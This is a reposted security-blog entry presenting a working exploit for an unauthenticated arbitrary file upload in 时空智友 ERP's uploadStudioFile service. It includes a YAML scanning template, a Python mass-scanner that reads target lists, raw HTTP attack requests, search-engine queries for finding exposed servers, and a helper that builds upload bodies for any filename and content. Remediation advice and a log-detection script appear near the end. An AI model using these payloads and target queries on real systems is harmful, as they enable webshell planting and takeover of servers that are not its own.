时空智友 ERP uploadstudiofile file upload POC

admin, 2024-07-04 12:56:51


POC (YAML & Python)

Straight to the POC. The YAML POC was generated with yakit or the ProjectDiscovery Cloud Platform and the Python POC was generated by ChatGPT; verify their accuracy yourself. If you find this useful, please follow: the latest vulnerability POCs are posted here every day.

  • 「YAML」
id: ShikongERP-uploadStudioFile-fileupload

info:
  name: 时空智友 ERP uploadStudioFile file upload
  author: god
  severity: high
  description: Arbitrary file upload via the updater.uploadStudioFile service of 时空智友 ERP

http:
  - raw:
      - |
        @timeout: 30s
        POST /formservice?service=updater.uploadStudioFile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        Content-Length: 609

        content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->

      - |+
        @timeout: 30s
        GET /update/temp/studio/test.jsp HTTP/1.1
        Host: {{Hostname}}

    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'status_code_2 == 200'
          - 'contains(body_2, "12321")'
        condition: and

 


  • 「Python」
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse

import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

RED = '\033[91m'
RESET = '\033[0m'

# Ignore certificate verification warnings (targets often run self-signed TLS)
urllib3.disable_warnings(category=InsecureRequestWarning)

# Request body: an XML descriptor of the file (name, path, size, mtime) followed by the
# file body, percent-encoded byte by byte, inside an XML comment. The JSP prints
# 111 * 111 (12321) and then deletes itself from disk.
PAYLOAD = 'content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->'


def upload_studio_file(url):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    upload_url = f"{url.rstrip('/')}/formservice?service=updater.uploadStudioFile"
    shell_url = f"{url.rstrip('/')}/update/temp/studio/test.jsp"

    try:
        # Step 1: upload test.jsp through the updater.uploadStudioFile service
        response = requests.post(upload_url, headers=headers, data=PAYLOAD, verify=False, timeout=30)
        if response.status_code == 200:
            # Step 2: request the uploaded file; 12321 in the body proves the JSP executed
            shell_response = requests.get(shell_url, verify=False, timeout=30)
            if shell_response.status_code == 200 and "12321" in shell_response.text:
                print(f"{RED}URL [{url}] is vulnerable to 时空智友 ERP uploadstudiofile file upload{RESET}")
            else:
                print(f"URL [{url}] does not appear to be vulnerable")
        else:
            print(f"URL [{url}] upload failed, response status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"URL [{url}] request failed: {e}")


def normalize(url):
    # Default to http:// when no scheme is given
    url = url.strip()
    if not url.startswith("http://") and not url.startswith("https://"):
        url = "http://" + url
    return url


def main():
    parser = argparse.ArgumentParser(description='Check whether a target is vulnerable to 时空智友 ERP uploadstudiofile file upload')
    parser.add_argument('-u', '--url', help='target URL')
    parser.add_argument('-f', '--file', help='text file containing one target URL per line')

    args = parser.parse_args()

    if args.url:
        upload_studio_file(normalize(args.url))
    elif args.file:
        with open(args.file, 'r') as file:
            for line in file:
                if line.strip():
                    upload_studio_file(normalize(line))
    else:
        parser.print_help()


if __name__ == '__main__':
    main()

 


Vulnerability description

时空智友 ERP draws on years of pharmaceutical-industry experience. Built around a comprehensive, fine-grained enterprise management scheme and extended with internet-era elements (mobile technology, cloud computing, online marketing), it manages supplier procurement, sales, warehousing, storage, quality, chain stores, retail, membership and promotions end to end, integrating logistics, funds and cash flow. Its uploadStudioFile interface has an arbitrary file upload vulnerability: an attacker can upload arbitrary files to the server, including webshell backdoors, and thereby take control of the server. The POC above sends no session cookie or credentials, so the interface appears to be reachable without authentication.


Asset mapping

  • 「Fofa」

body="login.jsp?login=null"

  • 「Hunter」

web.body="login.jsp?login=null"

  • 「Quake」

body="login.jsp?login=null"


Reproduction

「1. Build the request」

POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 609

content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->


「2. Request the uploaded file」

GET /update/temp/studio/test.jsp HTTP/1.1
Host: ip

A 200 response whose body contains 12321 confirms that the uploaded JSP executed: decoding the percent-encoded comment in the request above gives a JSP that prints 111 * 111 and then deletes itself from disk, so a repeat GET is expected to fail once the probe has run.
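The body of the upload request is two things glued together: an XML descriptor (filename, filepath, filesize, lmtime) and the file contents, placed after the descriptor inside an XML comment with every byte percent-encoded. The block below is an added example, not code from the original post or from the vendor: it decodes the page's own payload to show what actually lands in test.jsp, rebuilds a body of the same shape from arbitrary file bytes, and generates the page's self-deleting probe with a caller-chosen pair of factors so the marker is not always 12321. The helper names are mine. Decoding the page's payload gives 148 bytes although the descriptor declares 172; the page reports success with that mismatch, which suggests the field is not checked strictly, but the builder fills in the real length anyway.

```python
import re
from urllib.parse import unquote_to_bytes

# The upload request body from the page's PoC, without the leading "content=".
PAGE_BODY = (
    '<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath>'
    '<filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--'
    '%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72'
    '%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22'
    '%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70'
    '%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73'
    '%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28'
    '%29%3b%0d%0a%25%3e%0d%0a-->'
)

FIELD_RE = re.compile(r"<(filename|filepath|filesize|lmtime)>(.*?)</\1>")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)


def decode_upload_body(body: str) -> dict:
    """Split an uploadStudioFile body into its descriptor fields and the decoded file bytes."""
    if body.startswith("content="):
        body = body[len("content="):]
    meta = {k: unquote_to_bytes(v).decode() for k, v in FIELD_RE.findall(body)}
    m = COMMENT_RE.search(body)
    if m is None:
        raise ValueError("no <!-- --> comment carrying the file body")
    meta["declared_size"] = int(meta.pop("filesize"))
    meta["data"] = unquote_to_bytes(m.group(1))  # file contents as written to disk
    return meta


def percent_encode_all(data: bytes) -> str:
    """Encode every byte as lowercase %xx, as the page's payload does."""
    return "".join("%%%02x" % b for b in data)


def build_upload_body(filename: str, data: bytes, filepath: str = "./",
                      lmtime: str = "1970-01-01 08:00:00") -> str:
    """Rebuild a request body in the page's layout; filesize is the real length of data."""
    xml = (
        '<?xml%20version="1.0"?><root>'
        f"<filename>{filename}</filename>"
        f"<filepath>{filepath}</filepath>"
        f"<filesize>{len(data)}</filesize>"
        f"<lmtime>{lmtime.replace(' ', '%20')}</lmtime>"
        "</root>"
    )
    return "content=" + xml + "<!--" + percent_encode_all(data) + "-->"


def make_probe_jsp(a: int, b: int) -> bytes:
    """Self-deleting probe in the style of the page's payload: prints a*b, then removes itself.
    The page uses 111 * 111; any other pair gives a marker that static content will not contain."""
    src = (
        '<% out.print("<pre>");'
        f"out.println({a} * {b});"
        'out.print("</pre>");'
        "new java.io.File(application.getRealPath(request.getServletPath())).delete();"
        "\r\n%>\r\n"
    )
    return src.encode()


if __name__ == "__main__":
    meta = decode_upload_body("content=" + PAGE_BODY)
    print(meta["filename"], meta["filepath"], meta["lmtime"])
    print("declared size:", meta["declared_size"], "actual size:", len(meta["data"]))
    print(meta["data"].decode())
    print(build_upload_body("probe.jsp", make_probe_jsp(123, 457)))
```

Run the block as a script to see the decoded JSP; `build_upload_body` output can be dropped straight into the POST from step 1 (requests recomputes Content-Length).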


Remediation

  • The vendor has released a security patch; contact the vendor to apply it or upgrade to a fixed version.
  • Put a web application firewall in front of the application and configure a rule that intercepts calls to the updater.uploadStudioFile service on /formservice.
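Until the patch is applied, the two requests the POC makes are easy to spot in web-server access logs. The block below is an added example, not code from the original post or the vendor: it classifies access-log lines against two rules taken from the page (a call to the updater.uploadStudioFile service on /formservice, and a request for a JSP under /update/temp/studio/) and reports source IPs that triggered both, which is the upload-then-execute pattern. The log lines are constructed for the example; the combined log format, the `.jsp`/`.jspx` extension list and the benign paths are assumptions, and since access logs do not carry the POST body the rule keys on the query string and path only.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Combined/common access-log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_PATH = "/formservice"                 # endpoint from the page
UPLOAD_SERVICE = "updater.uploadStudioFile"  # service parameter from the page
DROP_DIR = "/update/temp/studio/"            # where the page's uploaded file is served from
SCRIPT_EXTS = (".jsp", ".jspx")              # assumption: JSP container; extend per deployment


@dataclass(frozen=True)
class Finding:
    ip: str
    ts: str
    rule: str
    method: str
    target: str
    status: int


def classify(line: str):
    """Return a Finding for one access-log line, or None if it matches neither rule."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = m["target"]
    parts = urlsplit(target)
    services = parse_qs(parts.query).get("service", [])
    if parts.path == UPLOAD_PATH and UPLOAD_SERVICE in services:
        rule = "uploadStudioFile-call"          # any method: a WAF rule should not depend on POST
    elif parts.path.startswith(DROP_DIR) and parts.path.lower().endswith(SCRIPT_EXTS):
        rule = "script-under-studio-temp"       # someone fetching a script from the drop directory
    else:
        return None
    return Finding(m["ip"], m["ts"], rule, m["method"], target, int(m["status"]))


def scan(lines):
    """Classify every line; return (all findings, sorted IPs that hit both rules)."""
    findings = [f for f in map(classify, lines) if f is not None]
    rules_by_ip = {}
    for f in findings:
        rules_by_ip.setdefault(f.ip, set()).add(f.rule)
    both = sorted(ip for ip, rules in rules_by_ip.items() if len(rules) == 2)
    return findings, both


# Constructed sample log: one upload-then-fetch sequence and two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jul/2024:12:56:51 +0800] "POST /formservice?service=updater.uploadStudioFile HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jul/2024:12:56:52 +0800] "GET /update/temp/studio/test.jsp HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Jul/2024:12:57:10 +0800] "GET /login.jsp?login=null HTTP/1.1" 200 5190 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Jul/2024:12:57:11 +0800] "GET /update/temp/studio/notes.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    findings, both = scan(SAMPLE_LOG.splitlines())
    for f in findings:
        print(f"{f.ts} {f.ip} {f.rule}: {f.method} {f.target} -> {f.status}")
    print("upload followed by script fetch from:", both)
```

Feed real logs with `scan(open(path))`; a hit on the first rule alone is worth blocking at the WAF, and an IP on the `both` list means the uploaded file was requested and the host should be treated as compromised.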

 

Originally published by the WeChat public account 浅梦安全: [Vulnerability reproduction | with POC] 时空智友 ERP uploadstudiofile file upload

Posted by admin on 2024-07-04 12:56:51. When reposting, keep the source link (CN-SEC 中文网, with thanks to the original author): http://cn-sec.com/archives/2917036.html
